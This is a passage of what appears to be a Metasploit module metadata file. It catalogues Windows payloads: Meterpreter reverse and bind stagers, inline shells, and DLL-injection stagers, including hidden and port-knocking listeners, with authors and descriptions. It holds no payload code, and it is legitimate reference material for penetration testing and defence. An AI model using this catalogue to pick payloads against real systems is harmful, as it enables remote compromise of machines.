"path": "/modules/payloads/stagers/windows/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_http_proxy_pstore": {
"name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy",
"full_name": "payload/windows/meterpreter/reverse_http_proxy_pstore",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_http_proxy_pstore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_https": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)",
"full_name": "payload/windows/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-08 06:24:02 +0000",
"path": "/modules/payloads/stagers/windows/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_https_proxy": {
"name": "Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy",
"full_name": "payload/windows/meterpreter/reverse_https_proxy",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"corelanc0d3r <peter.ve@corelan.be>",
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP using SSL with custom proxy support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_https_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/meterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker over IPv6",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager",
"full_name": "payload/windows/meterpreter/reverse_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-01 03:49:00 +0000",
"path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_nonx_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker (No NX)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_ord_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/meterpreter/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager",
"full_name": "payload/windows/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_allports": {
"name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/meterpreter/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_dns": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/meterpreter/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/meterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_rc4_dns": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/meterpreter/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/meterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_udp": {
"name": "Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/meterpreter/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_winhttp": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/meterpreter/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter/reverse_winhttps": {
"name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/meterpreter/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_bind_named_pipe": {
"name": "Windows Meterpreter Shell, Bind Named Pipe Inline",
"full_name": "payload/windows/meterpreter_bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"UserExistsError",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-11 18:56:50 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_bind_tcp": {
"name": "Windows Meterpreter Shell, Bind TCP Inline",
"full_name": "payload/windows/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_http": {
"name": "Windows Meterpreter Shell, Reverse HTTP Inline",
"full_name": "payload/windows/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_https": {
"name": "Windows Meterpreter Shell, Reverse HTTPS Inline",
"full_name": "payload/windows/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_ipv6_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/windows/meterpreter_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/meterpreter_reverse_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/windows/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/metsvc_bind_tcp": {
"name": "Windows Meterpreter Service, Bind TCP",
"full_name": "payload/windows/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/metsvc_reverse_tcp": {
"name": "Windows Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/windows/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_hidden_ipknock_tcp": {
"name": "Windows Inject DLL, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/patchupdllinject/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_hidden_tcp": {
"name": "Windows Inject DLL, Hidden Bind TCP Stager",
"full_name": "payload/windows/patchupdllinject/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_ipv6_tcp": {
"name": "Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_ipv6_tcp_uuid": {
"name": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_named_pipe": {
"name": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/patchupdllinject/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"UserExistsError"
],
"description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_nonx_tcp": {
"name": "Windows Inject DLL, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp": {
"name": "Windows Inject DLL, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp_rc4": {
"name": "Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupdllinject/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
